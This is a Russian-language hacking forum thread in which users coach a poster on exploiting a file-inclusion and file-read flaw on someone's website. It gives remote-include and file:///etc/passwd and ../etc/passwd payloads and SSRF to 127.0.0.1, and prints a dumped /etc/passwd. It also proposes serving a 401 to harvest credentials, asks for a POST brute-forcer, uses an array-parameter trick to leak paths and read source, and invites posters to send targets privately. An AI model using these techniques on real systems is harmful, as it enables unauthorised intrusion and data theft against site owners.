![]() |
Такая трабла есть инклуд.Похож на RFI.Допустим перехожу site.com/blablabla=http://hack.ru/phpinfo.php открывает пхп инфо моего сайта(hack).
|
Цитата:
|
Цитата:
|
Цитата:
вопрос вообще про инклуд сначала был /etc/shells /etc/passwd по классике попробуй проинклудить |
Цитата:
|
site.com/blablabla=
Цитата:
в i.txt а что если, file:///etc/passwd || http://127.0.0.1:80 |
Цитата:
file:///etc/passwd || http://127.0.0.1:80 - нет результатов((( |
Цитата:
|
так ты файл читать можешь локальный?
file:///etc/passwd /blablabla=../etc/passwd |
file:///etc/passwd да вот только что нашел,ток в другом месте
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh /etc/group crontab:x:102: Debian-exim:x:103: mlocate:x:104: ssh:x:105: А есть брут??работающий с post запросами? |
Цитата:
|
На самом деле больше похоже на XSRF. Т.е. сервер site.com получает URL, идет по нему, забирает контент и отдает его уже тебе.
посмотри в логах своего веб сервера на hack.com с каким юзер-агентом он приходит к тебе. можно попробовать в ответ на запрос ему отдать 401-й код - вдруг прилетят авторизационные данные. Если бы была винда - смог бы отрелеиться. |
file:///etc/passwd да вот только что нашел,ток в другом месте,это у же другой запрос(пост).Вот etcpasswd нашел.Подскажите что делать дальше
|
Цитата:
|
Цитата:
тс как бы учится, и хер знает rfi там или lfi, или вообще fopen или file_get_contents "На самом деле я лично не одну такую уязвимость не нашёл, только в тасках" да ладно, вчера такую нашел, просто искать надо правда там не lfi а чтение файлов через fopen, но всё же тс, ошибки php на сайт выводятся? если да надо узнать докрут до сайта(или каким нибудь другим способом) и первым делом прочитать уязвимый скрипт |
Цитата:
|
Цитата:
http://dantant.com/proxy/miniProxy.p...://google.com/ для примера, прокся типа, хотя по факту читалка файлов сам ещё толком не крутил, там какая то свалка на домене) |
Цитата:
И много таких прикольных моментов. Но почему я только сейчас стал обращать на это внимания п.с спасибо за сыль, будет чем заняться на досуге |
Кидай таргет в ЛС.
|
Цитата:
пост в авторизации site.com/login post data login[]=lol дает нам /var/www/site.com/public_html/lol/db.php error 31 line тогда мы имеем следующую возможность чтения file:///var/www/site.com/public_html/index.php |
| Время: 13:47 |